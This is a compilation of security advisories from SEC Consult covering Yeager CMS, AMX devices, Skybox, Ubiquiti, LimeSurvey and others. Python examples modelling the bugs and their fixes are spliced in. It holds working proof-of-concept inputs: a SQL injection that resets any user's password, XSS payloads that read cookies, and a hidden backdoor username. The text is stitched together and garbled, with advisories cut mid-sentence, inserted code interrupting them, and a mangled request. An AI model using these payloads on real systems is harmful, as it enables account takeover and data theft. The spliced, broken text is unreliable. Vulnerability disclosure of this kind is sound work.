 vulnerable version: 1.2.1
      fixed version: 1.3
         CVE number: CVE-2015-7567, CVE-2015-7568, CVE-2015-7569,
                     CVE-2015-7570, CVE-2015-7571, CVE-2015-7572
             impact: Critical
           homepage: http://yeager.cm/en/home/
              found: 2015-11-18
                 by: P. Morimoto (Office Bangkok)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
                     Singapore - Vienna (HQ) - Vilnius - Zurich
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
Yeager is an open source CMS that aims to become the most cost/time-effective
solution for medium and large web sites and applications.

Business recommendation:
------------------------
Yeager CMS suffers from multiple vulnerabilities due to improper input
validation and unprotected test scripts. By exploiting these vulnerabilities
an attacker could:
1. Change users' passwords, including the administrator's account.
2. Gain full access to the Yeager CMS database.
3. Determine internal servers that are inaccessible from the Internet.
4. Attack other users of the Yeager CMS with Cross-Site Scripting.

SEC Consult recommends not to use this software until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.

Vulnerability overview/description:
-----------------------------------
1. Unauthenticated Blind SQL Injection (CVE-2015-7567, CVE-2015-7568)
2. Post-authentication Blind SQL Injection (CVE-2015-7569)
3. Unauthenticated Arbitrary File Upload (CVE-2015-7571)
4. Unauthenticated Server-side Request Forgery (CVE-2015-7570)
5. Non-permanent Cross-site Scripting (CVE-2015-7572)

Proof of concept:
-----------------
1. Unauthenticated Blind SQL Injection (CVE-2015-7567, CVE-2015-7568)

http:///yeager/?action=passwordreset=

http:///yeager/y.php/responder?handler=setNewPassword=sess_2=70
=["noevent",{"yg_property":"setNewPassword","params":{"userToken":""}}]

The vulnerability can also be used to reset the password of any user without
authorization. In order to reset a specific user's password, an attacker
needs a valid email address of the user they want to attack. The address can
be retrieved either by social engineering or through the aforementioned
unauthenticated SQL injection.

http:///yeager/y.php/responder?handler=recoverLogin=sess_2=70
ata=["noevent",{"yg_property":"recoverLogin","params":{"userEmail":"<victim@email.com>","winID":"1"}}]

The above URL simply creates a password reset token and sends it to the
user's email address. Next, even though the attacker does not know the
token, the injected SQL selects the victim's record directly and forces the
new password to be set immediately. Note that the new password MUST be at
least 8 characters long and must contain both letters and numbers.

http:///yeager/y.php/responder?handler=setNewPassword=sess_2=70
=["noevent",{"yg_property":"setNewPassword","params":{"userToken":"'+or+uid=(select+id+from+yg_user+where+login='<vic...@email.com>')+limit+1--+-","userPassword":"","winID":"1"}}]

2. Post-authentication Blind SQL Injection (CVE-2015-7569)

http:///yeager/y.php/tab_USERLIST

POST Data:
win_no=4_id=2-user_type=user=wid_4=1==sess_16000&lh=325_page=2_perpage=1_orderby=_orderdir=4_from=5_limit=6,7=1

3. Unauthenticated Arbitrary File Upload (CVE-2015-7571)
A publicly known arbitrary file upload vulnerability in Plupload was found in
Yeager CMS. Fortunately, successful exploitation requires the PHP directive
"upload_tmp_dir" to be set to an existing directory that contains a writable
subdirectory "plupload". By default the PHP directive "upload_tmp_dir" is
empty; as a result the script attempts to upload the file to /plupload/
instead, which generally does not exist on the filesystem.

http:///yeager/ui/js/3rd/plupload/examples/upload.php

4. Unauthenticated Server-side Request Forgery (CVE-2015-7570)

http:///yeager/libs/org/adodb_lite/tests/test_adodb_lite.php
http:///yeager/libs/org/adodb_lite/tests/test_datadictionary.php
http:///yeager/libs/org/adodb_lite/tests/test_adodb_lite_sessions.php

The parameter "dbhost" can be used to perform internal port scan using
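The following is an added example, not code from the advisory or from Yeager CMS. It models the password-reset flow that proof of concept 1 abuses: recoverLogin stores a reset token for the victim, and setNewPassword looks the token up. With the token concatenated into the query, the published payload (`' or uid=(select id from yg_user where login='<victim>') limit 1-- -`, written here with spaces instead of the URL-encoded `+`) selects the victim's record without the attacker ever seeing the token; with a parameterised lookup the same string matches nothing. The table yg_user, its login column and the uid column appear in the published payload; the reset table name, the other columns, the password hashing and the use of SQLite are assumptions. The password policy check is the one the advisory quotes.

```python
import hashlib
import hmac
import secrets
import sqlite3

# Constructed example, not Yeager CMS code. yg_user/login/uid come from the
# published payload; everything else about the schema is an assumption, and
# SQLite stands in for the CMS's own database.
INJECTION = "' or uid=(select id from yg_user where login='admin') limit 1-- -"


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE yg_user (id INTEGER PRIMARY KEY, login TEXT UNIQUE,
                              salt BLOB, pwhash BLOB);
        CREATE TABLE yg_pwreset (uid INTEGER REFERENCES yg_user(id), token TEXT);
    """)
    for login, pw in (("admin", "Correct-Horse-9"), ("alice", "alice-pass-1")):
        salt = secrets.token_bytes(16)
        conn.execute("INSERT INTO yg_user (login, salt, pwhash) VALUES (?, ?, ?)",
                     (login, salt, _hash(pw, salt)))
    return conn


def check_login(conn, login: str, password: str) -> bool:
    row = conn.execute("SELECT salt, pwhash FROM yg_user WHERE login=?", (login,)).fetchone()
    return row is not None and hmac.compare_digest(_hash(password, row[0]), row[1])


def valid_password(pw: str) -> bool:
    """Policy quoted in the advisory: at least 8 characters, letters and digits."""
    return len(pw) >= 8 and any(c.isalpha() for c in pw) and any(c.isdigit() for c in pw)


def recover_login(conn, login: str) -> str:
    """recoverLogin: create the reset token the real user receives by mail."""
    token = secrets.token_hex(16)
    uid = conn.execute("SELECT id FROM yg_user WHERE login=?", (login,)).fetchone()[0]
    conn.execute("INSERT INTO yg_pwreset (uid, token) VALUES (?, ?)", (uid, token))
    return token


def _apply_reset(conn, uid: int, new_pw: str) -> bool:
    salt = secrets.token_bytes(16)
    conn.execute("UPDATE yg_user SET salt=?, pwhash=? WHERE id=?",
                 (salt, _hash(new_pw, salt), uid))
    conn.execute("DELETE FROM yg_pwreset WHERE uid=?", (uid,))
    return True


def set_new_password_vulnerable(conn, user_token: str, new_pw: str) -> bool:
    """The token is concatenated into the query, so the payload's OR clause
    selects the victim's uid whatever the stored token is."""
    if not valid_password(new_pw):
        return False
    sql = "SELECT uid FROM yg_pwreset WHERE token='%s'" % user_token
    row = conn.execute(sql).fetchone()
    return row is not None and _apply_reset(conn, row[0], new_pw)


def set_new_password_safe(conn, user_token: str, new_pw: str) -> bool:
    """Parameterised lookup: the payload is just a token string that matches nothing."""
    if not valid_password(new_pw):
        return False
    row = conn.execute("SELECT uid FROM yg_pwreset WHERE token=?", (user_token,)).fetchone()
    return row is not None and _apply_reset(conn, row[0], new_pw)
```

Note that the reset row must exist for the OR clause to have something to match, which is exactly why the advisory's attack first calls recoverLogin for the victim; rate-limiting or single-use tokens do not help here because the token is never compared.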
SEC Consult SA-20160121-0 :: Deliberately hidden backdoor account in AMX (Harman Professional) devices
Disclaimer: Although the backdoor vulnerability is quite a serious matter, we
have published an accompanying blog post to this technical advisory which
takes a lighter look at the topic. Visit our blog at
http://blog.sec-consult.com/2016/01/deliberately-hidden-backdoor-account-in.html
for more information.

SEC Consult Vulnerability Lab Security Advisory < 20160121-0 >
=======================================================================
              title: Deliberately hidden backdoor account
            product: Several AMX (HARMAN Professional) devices, see section
                     "Vulnerable / tested versions"
 vulnerable version: v1.2.322, v1.3.100 for AMX NX-1200, multiple other products
      fixed version: untested hotfix and firmware updates available
         CVE number: CVE-2015-8362
             impact: critical
           homepage: http://www.amx.com
              found: 2015-03-10
                 by: Matthias Klinski, Manuel Hofer (Office Vienna)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Berlin - Frankfurt/Main - Montreal - Moscow
                     Singapore - Vienna (HQ) - Vilnius - Zurich
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"AMX® (www.amx.com) is part of the HARMAN Professional Division, and the
leading brand for the business, education, and government markets for the
company. As such, AMX is dedicated to integrating AV solutions for an IT
World. AMX solves the complexity of managing technology with reliable,
consistent and scalable systems comprising control and automation,
system-wide switching and AV signal distribution, digital signage and
technology management. AMX systems are deployed worldwide in conference
rooms, homes, classrooms, network operation/command centers, hotels,
entertainment venues and broadcast facilities, among others."

Source: http://www.amx.com/automate/aboutamx.aspx

Business recommendation:
------------------------
Attackers are able to completely compromise the affected devices, as the
backdoor grants them higher privileges than even administrative access to
the system.

SEC Consult highly recommends not to use these products until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.

Vulnerability overview/description:
-----------------------------------
1) Deliberately hidden backdoor account
While analysing the application binary /bin/bw, SEC Consult discovered a
function called "setUpSubtleUserAccount" which adds an administrative account
to the internal user database. This account can be used to log on to the web
interface as well as via SSH. The functions that retrieve the list of all
users in the database were found to deliberately hide this user, so the
account does not show up in any user listing. Furthermore, the backdoor
account is granted additional features on the remote CLI, such as a facility
to capture packets on the network interface, which not even an administrator
account can use.

Proof of concept:
-----------------
The binary /bin/bw, which provides core functionality as well as user
management for the AMX NX-1200, implements a function called
"setUpSubtleUserAccount" that is called on system boot. This function adds an
administrative account with hardcoded credentials to the user database:

    STMFD   SP!, {R4-R7,LR}
    LDR     R4, =aMu1cqhrnyu4                   ; "QmxhY2tXaWRvdw"
    SUB     SP, SP, #0x44
    ADD     R12, R4, #0x38
    ADD     LR, SP, #0x58+cSubtleUserPassword
    MOV     R5, this
    LDMIA   R12!, {this-R3}                     ; ""
    STMIA   LR!, {R0-R3}
    ADD     R3, R4, #0x54
    LDMIA   R12, {R0,R1}
    MOV     R4, #0
    ADD     R12, SP, #0x58+cSubtleUserUserName+0x10
    STR     R0, [LR],#4
    STRB    R4, [R12],#1
    STRH    R1, [LR],#2
    ADD     R6, SP, #0x58+cSubtleUserUserName

By decoding the strings which are loaded from memory and copied into
cSubtleUserPassword and cSubtleUserUserName, the following user and password
can be recovered:

    user:     BlackWidow
    password: [not published, see below]

Using these credentials a successful login has been performed to the
web-based management interface as well as to the command line interface.
Using this backdoor account grants additional features on the command line
interface, such as capturing packets on the network interface.

Parts of the application which display a list of users are designed to
deliberately hide the backdoor account, so auditing the user list on the
device does not reveal it; a login attempt does.

The backdoor was not removed by AMX in their first patch; only the backdoor
username was changed to the name of another DC superhero. The new username
was: 1MB@tMaN

The hotfix from 2016-01-15 is untested by SEC Consult and it is unknown
whether the backdoor has now been removed properly. Hence the password will
not be published.

Vulnerable / tested versions:
-----------------------------
The following software versions of the
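As an added example, not code from the advisory or from AMX, the snippet below reproduces the decoding step the advisory describes and turns it into a small firmware-triage helper: the username literal `QmxhY2tXaWRvdw` that the disassembly loads is base64 stored without its `==` padding, and the same pattern can be searched for across a whole binary. The only page-derived input is that literal; the surrounding blob, the decoder's thresholds and the function names are assumptions.

```python
import base64
import binascii
import re
import string

# Constructed example, not AMX firmware code. The only page-derived input is
# the string literal "QmxhY2tXaWRvdw" from the disassembly of /bin/bw; the
# blob below is fabricated to exercise the scanner.
PRINTABLE = set(string.printable) - set("\x0b\x0c")
B64_CANDIDATE = re.compile(rb"[A-Za-z0-9+/]{12,}={0,2}")


def decode_unpadded(s: str) -> str:
    """Decode base64 that was stored without '=' padding, as in the binary:
    14 data characters need two '=' to make a whole group of four."""
    padded = s + "=" * (-len(s) % 4)
    return base64.b64decode(padded).decode("ascii")


def looks_printable(data: bytes, min_len: int = 4) -> bool:
    return len(data) >= min_len and all(chr(b) in PRINTABLE for b in data)


def find_encoded_strings(blob: bytes) -> list:
    """Return (candidate, decoded) pairs for every base64-looking run in the
    blob that decodes to printable ASCII. Ordinary identifiers such as
    symbol names also match the alphabet but decode to binary junk and are
    dropped by the printable filter."""
    hits = []
    for m in B64_CANDIDATE.finditer(blob):
        cand = m.group().decode("ascii").rstrip("=")
        try:
            raw = base64.b64decode(cand + "=" * (-len(cand) % 4))
        except (binascii.Error, ValueError):
            continue          # length that no padding can repair
        if looks_printable(raw):
            hits.append((cand, raw.decode("ascii")))
    return hits


# Fabricated firmware-like blob: a NUL-separated string table holding the
# advisory's username literal, an ordinary symbol name and some binary.
SAMPLE_BLOB = (
    b"\x7fELF\x01\x01\x01\x00\x00\x00"
    b"setUpSubtleUserAccount\x00QmxhY2tXaWRvdw\x00/bin/bw\x00"
    b"\xde\xad\xbe\xef\x00"
)
```

Running `find_encoded_strings` over a whole firmware image produces a short list of decodable strings; anything that decodes to a name or a password-shaped value next to account-management code is worth the same scrutiny the advisory gave `setUpSubtleUserAccount`.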
SEC Consult whitepaper: Bypassing McAfee Application Whitelisting for Critical Infrastructure Systems
SEC Consult Vulnerability Lab released a new whitepaper titled:
"Bypassing McAfee Application Whitelisting for Critical Infrastructure
Systems" - the dinosaurs want their vuln back

Link to blog overview:
----------------------
Including slides from presentations on this topic (with details & demos on
vulnerabilities & vendor responses):
http://blog.sec-consult.com/2016/01/mcafee-application-control-dinosaurs.html

Direct link to whitepaper:
--------------------------
https://www.sec-consult.com/fxdata/seccons/prod/media/Whitepaper_Bypassing_McAfees_Application_Whitelisting_for_critical_infrastructure_systems_v1%200.pdf

Abstract:
---------
This paper describes the results of the research conducted by SEC Consult
Vulnerability Lab on the security of McAfee Application Control. This product
is an example of an application whitelisting solution which can be used to
further harden critical systems such as servers in SCADA environments or
client systems with high security requirements like administrative
workstations.

Application whitelisting works by whitelisting all software installed on a
system and subsequently preventing the execution of any software that is not
on the whitelist. This is meant to prevent the execution of malware and
therefore to protect against advanced persistent threat (APT) attacks.

McAfee Application Control is an example of such software. It can be
installed on any system; however, its main field of application is the
protection of highly critical infrastructures. While the core feature of the
product is application whitelisting, it also supports additional security
features including write- and read-protection as well as different memory
corruption protections.

The paper will show:
* how application whitelisting can be bypassed in multiple ways
* how User Account Control can be bypassed on such protected systems
* how additional protections such as read- or write-protections can be
  bypassed
* how additional memory corruption protections can easily be bypassed
* that the software can decrease the overall security of your operating
  system

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab
SEC Consult
Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
SEC Consult SA-20151210-0 :: Skybox Platform Multiple Vulnerabilities
SEC Consult Vulnerability Lab Security Advisory < 20151210-0 >
=======================================================================
              title: Multiple Vulnerabilities
            product: Skybox Platform
 vulnerable version: <=7.0.611
      fixed version: 7.5.401
         CVE number:
             impact: Critical
           homepage: www.skyboxsecurity.com/products/appliance
              found: 2014-12-04
                 by: K. Gudinavicius, M. Heinzl, C. Schwarz (Office Singapore)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
                     Singapore - Vienna (HQ) - Vilnius - Zurich
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Skybox Security provides cutting-edge risk analytics for enterprise security
management. Our solutions give you complete network visibility, help you
eliminate attack vectors, and optimize your security management processes.
Protect the network and the business."

Source: http://www.skyboxsecurity.com/

Business recommendation:
------------------------
Attackers are able to perform Cross-Site Scripting and SQL Injection attacks
against the Skybox platform. Furthermore, it is possible for unauthenticated
attackers to download arbitrary files and execute arbitrary code.

SEC Consult recommends the vendor to conduct a comprehensive security
analysis, based on security source code reviews, in order to identify all
vulnerabilities in the Skybox platform and increase the security of its
customers.

Vulnerability overview/description:
-----------------------------------
1) Multiple Reflected Cross-Site Scripting Vulnerabilities
2) Multiple Stored Cross-Site Scripting Vulnerabilities
3) Arbitrary File Download and Directory Traversal Vulnerability
4) Blind SQL Injection Vulnerability
5) Remote Unauthenticated Code Execution

Proof of concept:
-----------------
1) Multiple Reflected Cross-Site Scripting Vulnerabilities
Multiple scripts are prone to reflected Cross-Site Scripting attacks. The
following example demonstrates this issue with the service
VersionRepositoryWebService:

POST /skyboxview/webservice/services/VersionRepositoryWebService HTTP/1.0
Content-type: text/plain
User-Agent: Axis/1.4
Host: localhost:8282
SOAPAction: ""
Content-Length: 863

http://schemas.xmlsoap.org/soap/envelope/; xmlns:xsd="http://www.w3.org/2001/XMLSchema; xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance;>http://schemas.xmlsoap.org/soap/encoding/; xmlns:ns1="http://com/skybox/view/webservice/versionrepository
c4f85 t;a xmlns:a=http://www.w3.org/1999/xhtmla:body onload=alert(1)//a9884933253b">
http://schemas.xmlsoap.org/soap/encoding/;>Application
http://schemas.xmlsoap.org/soap/encoding/;>windows-64
http://schemas.xmlsoap.org/soap/encoding/;>7.0.601

The payload is an XHTML-namespaced <a:body onload=alert(1)//> element
embedded in the first parameter of the SOAP request; the service reflects it
into its response unencoded.

Other scripts and parameters, such as the parameter "status" of the login
script (located at https://localhost:444/login.html), are affected as well.
The following request demonstrates this issue:

https://localhost:444/login.html?status=%27%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

2) Multiple Stored Cross-Site Scripting Vulnerabilities
Multiple fields of the Skybox Change Manager, which can be accessed at
https://localhost:8443/skyboxview/, are prone to stored Cross-Site Scripting
attacks. For example, when creating a new ticket, the title can be misused to
insert JavaScript code. The following GWT-RPC request to the server
demonstrates the issue:

Request:
POST /skyboxview/webskybox/tickets HTTP/1.1
Host: localhost:8443
[...]

7|0|18|https://localhost:8443/skyboxview/webskybox/|2725E|com.skybox.view.gwt.client.service.TicketsService|createAccessChangeTicket|com.skybox.view.transfer.netmodel.tickets.AccessChangeTicketData/1874789321|com.skybox.view.transfer.modelview.ChangeRequestGraph/1577593632|com.skybox.view.transfer.netmodel.phases.BasePhaseOperation/3921542662|java.util.Collection|com.skybox.view.transfer.netmodel.PhaseDefinitionId/3246549697|java.lang.String/2004016611|com.skybox.view.transfer.properties.PropertyBag/343216801|com.skybox.view.transfer.netmodel.TicketWorkflowId/3953158119|com.skybox.view.transfer.netmodel.ConfigurationItemId/1448062761|com.skybox.view.transfer.netmodel.tickets.ChangeRequestRiskEnum/852682809||skyboxview|test">|java.util.ArrayList/41

Other fields, like "Comments" and "Description", are affected as well.

3) Arbitrary File Download and Directory Traversal Vulnerability
Skybox Change Manager allows uploading and downloading attachments for
tickets. The download functionality can be exploited to download arbitrary
files from the server's file system. No authentication is required to
exploit this vulnerability.
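The following is an added example, not code from the advisory or from Skybox. It reproduces the bug class behind issue 3) in a throwaway directory layout (an attachment name used as a path with neither a containment nor an authentication check) next to the fixed download routine, and returns what each variant hands out so the difference is checkable. The directory layout, file names and the session representation are assumptions.

```python
import os
import tempfile

# Constructed example, not Skybox code. Directory layout, file names and the
# session model are assumptions.


def vulnerable_attachment_path(attachments_dir: str, name: str) -> str:
    """Joins unchecked: '../' walks out of the directory and an absolute
    name replaces attachments_dir entirely."""
    return os.path.join(attachments_dir, name)


def safe_attachment_path(attachments_dir: str, name: str):
    """Resolve symlinks and '..' first, then require the result to remain
    inside the attachments directory. Returns None when it does not."""
    base = os.path.realpath(attachments_dir)
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def download(session, attachments_dir: str, name: str) -> bytes:
    """Authenticated and contained download: both checks the advisory
    reports as missing."""
    if session is None or not session.get("authenticated"):
        raise PermissionError("login required")
    path = safe_attachment_path(attachments_dir, name)
    if path is None or not os.path.isfile(path):
        raise FileNotFoundError(name)
    with open(path, "rb") as fh:
        return fh.read()


def run_demo() -> dict:
    """Build a throwaway layout and record what each variant returns."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        att = os.path.join(root, "attachments")
        os.mkdir(att)
        with open(os.path.join(att, "ticket-1.txt"), "wb") as fh:
            fh.write(b"harmless attachment")
        with open(os.path.join(root, "secret.conf"), "wb") as fh:
            fh.write(b"db_password=hunter2")          # constructed secret
        traversal = "../secret.conf"
        # Vulnerable variant: the traversal name reads the file outside.
        with open(vulnerable_attachment_path(att, traversal), "rb") as fh:
            results["vulnerable_leaks"] = fh.read()
        # Safe variant: traversal and absolute names are refused, real names work.
        results["safe_blocks_traversal"] = safe_attachment_path(att, traversal) is None
        results["safe_blocks_absolute"] = safe_attachment_path(att, os.path.abspath(os.sep)) is None
        results["safe_allows_legit"] = safe_attachment_path(att, "ticket-1.txt") is not None
        results["legit_download"] = download({"authenticated": True}, att, "ticket-1.txt")
        try:
            download(None, att, "ticket-1.txt")
            results["unauth_blocked"] = False
        except PermissionError:
            results["unauth_blocked"] = True
        try:
            download({"authenticated": True}, att, traversal)
            results["auth_traversal_blocked"] = False
        except FileNotFoundError:
            results["auth_traversal_blocked"] = True
    return results
```

`os.path.realpath` is what makes the containment check meaningful: a plain string prefix test on the joined path can be defeated by a symlink inside the attachments directory, whereas comparing resolved paths with `os.path.commonpath` is not.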
SEC Consult SA-20151105-0 :: Insecure default configuration in Ubiquiti Networks products
SEC Consult Vulnerability Lab Security Advisory < 20151105-0 >
=======================================================================
              title: Insecure default configuration
            product: various Ubiquiti Networks products
 vulnerable version: see Vulnerable / tested versions
      fixed version: none available
             impact: High
           homepage: https://www.ubnt.com/
              found: 2015-08-17
                 by: Stefan Viehböck (Office Vienna)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Berlin - Frankfurt/Main - Montreal - Moscow
                     Singapore - Vienna (HQ) - Vilnius - Zurich
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
Ubiquiti Networks develops high-performance networking technology for
service providers and enterprises. Our technology platforms focus on
delivering highly advanced and easily deployable solutions that appeal to a
global customer base in underserved and underpenetrated markets.

Source: http://ir.ubnt.com/

Vulnerability overview/description:
-----------------------------------
1) Hardcoded cryptographic keys
A certificate including its private key is embedded in the firmware of
several Ubiquiti Networks products. The certificate is used for HTTPS (as the
default server certificate of the web-based management interface). Since
every device ships with the same private key, impersonation,
man-in-the-middle and passive decryption attacks are possible. These attacks
allow an attacker to obtain sensitive information such as admin credentials
and use them in further attacks.

Furthermore, searching for the certificate fingerprint in data from
internet-wide scans is a low-cost way of finding the IP addresses of specific
products or product groups, which allows an attacker to exploit
vulnerabilities at scale.

2) Remote management enabled by default
The remote management interface is enabled by default. This allows attackers
to exploit vulnerabilities in the device firmware as well as weak credentials
set by the user.

Further information can also be found in our blog post:
http://blog.sec-consult.com/2015/11/the-omnipresence-of-ubiquiti-networks.html

Proof of concept:
-----------------
1) Hardcoded cryptographic keys
OpenSSL text output for the certificate:

Certificate:
    Data:
        Version: 1 (0x0)
        Serial Number: 13408895465235657399 (0xba15f761dbb7b2b7)
    Signature Algorithm: sha1WithRSAEncryption
        Issuer: C=US, ST=CA, L=San Jose, O=Ubiquiti Networks Inc., OU=Technical Support, CN=UBNT/emailAddress=supp...@ubnt.com
        Validity
            Not Before: Jun  2 08:35:02 2011 GMT
            Not After : Jan  1 08:35:02 2020 GMT
        Subject: C=US, ST=CA, L=San Jose, O=Ubiquiti Networks Inc., OU=Technical Support, CN=UBNT/emailAddress=supp...@ubnt.com
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (1024 bit)
                Modulus:
                    00:be:09:9f:14:3a:f7:ee:e5:8a:c9:76:b2:26:17:
                    00:7b:0c:85:1c:94:8e:bd:7f:f5:a1:a5:6d:0a:2c:
                    64:cc:7f:78:bc:11:ee:dc:d9:e6:2a:cb:e1:9e:d8:
                    17:a6:9c:35:aa:da:c5:c1:3a:a5:48:dc:af:bc:99:
                    37:59:7e:88:3c:2c:d3:bb:e7:60:6d:e3:19:f9:4e:
                    18:4c:4c:3a:fd:5e:35:6f:a3:50:b9:50:c0:8e:8b:
                    fa:a0:ee:c4:96:c5:ba:4e:ed:d8:f1:18:05:36:89:
                    54:c2:dc:27:eb:75:74:1c:be:9a:4c:c8:e5:ce:fe:
                    47:44:96:a7:af:10:07:eb:15
                Exponent: 65537 (0x10001)
    Signature Algorithm: sha1WithRSAEncryption
         00:5a:31:81:3a:15:6d:30:95:8d:03:91:47:aa:23:e2:b4:c0:
         2e:d4:01:cd:d5:21:6b:69:5e:3c:71:27:10:1c:f5:87:d4:28:
         19:17:c2:3d:ec:36:fd:ee:93:07:8f:0b:30:65:0e:28:35:6c:
         25:9e:d8:24:16:85:65:29:da:47:df:30:09:84:33:2c:b4:b4:
         fa:f0:24:40:b9:ee:1e:f0:1c:33:c3:e1:06:70:2e:6b:fe:a0:
         d0:aa:81:6f:cf:1b:70:67:43:01:32:a0:da:bc:8c:a8:91:f3:
         cb:b1:97:30:04:f2:c6:77:e8:89:97:2c:d3:1f:cf:03:f1:fc:
         36:fa

Certificate:
-----BEGIN CERTIFICATE-----
MIICrTCCAhYCCQC6Ffdh27eytzANBgkqhkiG9w0BAQUFADCBmjELMAkGA1UEBhMCV
VMxCzAJBgNVBAgTAkNBMREwDwYDVQQHEwhTYW4gSm9zZTEfMB0GA1UEChMWVWJpcX
VpdGkgTmV0d29ya3MgSW5jLjEaMBgGA1UECxMRVGVjaG5pY2FsIFN1cHBvcnQxDTA
LBgNVBAMTBFVCTlQxHzAdBgkqhkiG9w0BCQEWEHN1cHBvcnRAdWJudC5jb20wHhcN
MTEwNjAyMDgzNTAyWhcNMjAwMTAxMDgzNTAyWjCBmjELMAkGA1UEBhMCVVMxCzAJB
gNVBAgTAkNBMREwDwYDVQQHEwhTYW4gSm9zZTEfMB0GA1UEChMWVWJpcXVpdGkgTm
V0d29ya3MgSW5jLjEaMBgGA1UECxMRVGVjaG5pY2FsIFN1cHBvcnQxDTALBgNVBAM
TBFVCTlQxHzAdBgkqhkiG9w0BCQEWEHN1cHBvcnRAdWJudC5jb20wgZ8wDQYJKoZI
hvcNAQEBBQADgY0AMIGJAoGBAL4JnxQ69+7lisl2siYXAHsMhRyUjr1/9aGlbQosZ
Mx/eLwR7tzZ5irL4Z7YF6acNaraxcE6pUjcr7yZN1l+iDws07vnYG3jGflOGExMOv
1eNW+jULlQwI6L+qDuxJbFuk7t2PEYBTaJVMLcJ+t1dBy+mkzI5c7+R0SWp
SEC Consult SA-20151022-0 :: Lime Survey Multiple Critical Vulnerabilities
SEC Consult Vulnerability Lab Security Advisory < 20151022-0 >
===
              title: Multiple critical vulnerabilities
            product: Lime Survey
 vulnerable version: 2.05 up to 2.06+ Build 151014
      fixed version: 2.06+ Build 151016
         CVE number:
             impact: critical
           homepage: https://www.limesurvey.org/
              found: 2015-10-12
                 by: P. Morimoto (Office Bangkok)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Berlin - Frankfurt/Main - Montreal - Singapore
                     Vienna (HQ) - Vilnius - Zurich - Bangkok
                     https://www.sec-consult.com
===

Vendor description:
---
Lime Survey allows users to quickly create intuitive, powerful, online question-and-answer surveys that can work for tens to thousands of participants without much effort. The survey software itself is self-guiding for the respondents who are participating.

Lime Survey has surpassed 1,500,000 downloads and is used by a huge number of private persons, big companies, academic facilities and governmental institutions around the world.

URL: https://www.limesurvey.org/en/about-limesurvey/references

Business recommendation:
---
By combining the vulnerabilities documented in this advisory, unauthenticated remote attackers can completely compromise the Lime Survey application server:
- Arbitrary local files can be downloaded
- The entire Lime Survey database can be accessed
- Arbitrary PHP code can be executed

SEC Consult recommends not to use this software until a thorough security review has been performed by security professionals and all identified issues have been resolved.

Vulnerability overview/description:
---
Due to the lack of function level access control, many administrative functions in Lime Survey can be accessed by remote attackers without prior authentication. Moreover, the application did not validate some user input properly. Unauthenticated attackers can pass specially crafted data to these entry points, resulting in the following vulnerabilities.

1. Unauthenticated local file disclosure
An attacker can craft a malicious PHP serialized string containing a list of arbitrary files. This list can be sent to the Lime Survey backup feature for downloading without prior authentication. Any files accessible with the privileges of the web server user can be downloaded.

2. Unauthenticated database dump
An attacker can request the database backup feature without authentication. The whole Lime Survey database can be downloaded, including the username and hashed password of the administrator account.

3. Unauthenticated arbitrary remote code execution
An attacker can inject arbitrary PHP code into the application source code, allowing them to plant a malicious web backdoor and access the underlying web server.

4. Multiple reflected cross-site scripting
The application is prone to multiple reflected cross-site scripting vulnerabilities.

Proof of concept:
---
The vendor kindly asked SEC Consult to give people enough time to update their installations. Because of the high risk vulnerabilities, the proof of concept section has been removed from this advisory.

Vulnerable / tested versions:
---
The vulnerabilities have been tested on 2.06+ Build 150930.
At least the following versions have been identified to be vulnerable:
Version 2.05 Build 150413 up to 2.06+ Build 151014

Vendor contact timeline:
---
2015-10-15: Contacting vendor through Lime Survey bug tracking system
2015-10-15: Vendor acknowledges existence of the vulnerabilities
2015-10-15: Urgent workaround is committed to Lime Survey's code repository
2015-10-16: Vendor asks for giving 6 weeks before disclosing the advisory
2015-10-16: Vendor releases Lime Survey 2.06+ Build 151016 with issues fixed
2015-10-22: SEC Consult releases security advisory without PoC

Solution:
---
Immediately upgrade to Lime Survey 2.06+ Build 151016 or later.
https://www.limesurvey.org/en/blog/76-limesurvey-news/security-advisories/1836-limesurvey-security-advisory-10-2015

Workaround:
---
No workaround available.

Advisory URL:
---
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~
SEC Consult Vulnerability Lab
SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich - Bangkok

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of n
SEC Consult SA-20150805-0 :: Websense Content Gateway Stack Buffer Overflow in handle_debug_network
SEC Consult Vulnerability Lab Security Advisory 20150805-0
===
              title: Stack buffer overflow in handle_debug_network
            product: Websense Triton Content Manager
 vulnerable version: 8.0.0 build 1165
      fixed version: V8.0.0 HF02
         CVE number: CVE-2015-5718
             impact: high
           homepage: www.websense.com
              found: 2015-04-13
                 by: C. Schwarz (Office Bangkok)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Berlin - Frankfurt/Main - Montreal - Singapore
                     Vienna (HQ) - Vilnius - Zurich
                     https://www.sec-consult.com
===

Vendor description:
---
